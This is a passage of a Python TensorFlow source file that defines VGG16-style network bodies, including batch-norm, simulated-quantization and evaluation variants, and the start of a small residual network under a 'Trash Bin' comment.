net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4c', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv5a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv5b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv5c', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=1024, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
net = Layer.FullyConnected(net.output, outputSize=1024, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC2', dtype=tf.float32)
layers.append(net)
return net.output, layers
def VGG16BNBody(network, images):
layers = []
standardized = tf.identity(images / 255.0, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3c', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4c', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv5a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv5b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv5c', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=1024, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
net = Layer.FullyConnected(net.output, outputSize=1024, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC2', dtype=tf.float32)
layers.append(net)
return net.output, layers
def VGG16Body_Quant(network, images, preWeights, preBias):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3c']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3c']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3c', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv4a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv4b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4c']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4c']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv4c', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv5a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv5a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv5a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv5b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv5b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv5b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv5c']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv5c']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv5c', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=1024, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC1', dtype=tf.float32)
layers.append(net)
net = Layer.FullyConnected(_outWrapper(net), outputSize=1024, weightInit=Layer.ConstInit(preWeights['FC2']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC2']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC2', dtype=tf.float32)
layers.append(net)
return net, layers
def VGG16Body_Eval(network, images, preWeights, preBias, preMin, preMax):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
# output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1a', dtype=tf.float32)
net.setMinMax(preMin['Conv1a'], preMax['Conv1a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1b', dtype=tf.float32)
net.setMinMax(preMin['Conv1b'], preMax['Conv1b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2a', dtype=tf.float32)
net.setMinMax(preMin['Conv2a'], preMax['Conv2a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2b', dtype=tf.float32)
net.setMinMax(preMin['Conv2b'], preMax['Conv2b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3a', dtype=tf.float32)
net.setMinMax(preMin['Conv3a'], preMax['Conv3a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3b', dtype=tf.float32)
net.setMinMax(preMin['Conv3b'], preMax['Conv3b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3c']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3c']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3c', dtype=tf.float32)
net.setMinMax(preMin['Conv3c'], preMax['Conv3c'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4a', dtype=tf.float32)
net.setMinMax(preMin['Conv4a'], preMax['Conv4a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4b', dtype=tf.float32)
net.setMinMax(preMin['Conv4b'], preMax['Conv4b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4c']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4c']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4c', dtype=tf.float32)
net.setMinMax(preMin['Conv4c'], preMax['Conv4c'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv5a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv5a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv5a', dtype=tf.float32)
net.setMinMax(preMin['Conv5a'], preMax['Conv5a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv5b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv5b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv5b', dtype=tf.float32)
net.setMinMax(preMin['Conv5b'], preMax['Conv5b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv5c']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv5c']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv5c', dtype=tf.float32)
net.setMinMax(preMin['Conv5c'], preMax['Conv5c'])
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=1024, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
net.setMinMax(preMin['FC1'], preMax['FC1'])
layers.append(net)
net = Layer.FullyConnected(_outWrapper(net), outputSize=1024, weightInit=Layer.ConstInit(preWeights['FC2']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC2']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC2', dtype=tf.float32)
net.setMinMax(preMin['FC2'], preMax['FC2'])
layers.append(net)
return net, layers
# Trash Bin
def SmallNetBody(network, images):
layers = []
standardized = tf.identity(images / 127.5 - 1, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Conv1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Conv2', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Conv3', dtype=tf.float32)
layers.append(net)
toadd = net.output
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Conv4', dtype=tf.float32)
layers.append(net)
added = toadd + net.output
net = Layer.Conv2D(added, convChannels=128, \
convKernel=[3, 3], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Conv5', dtype=tf.float32)
layers.append(net)
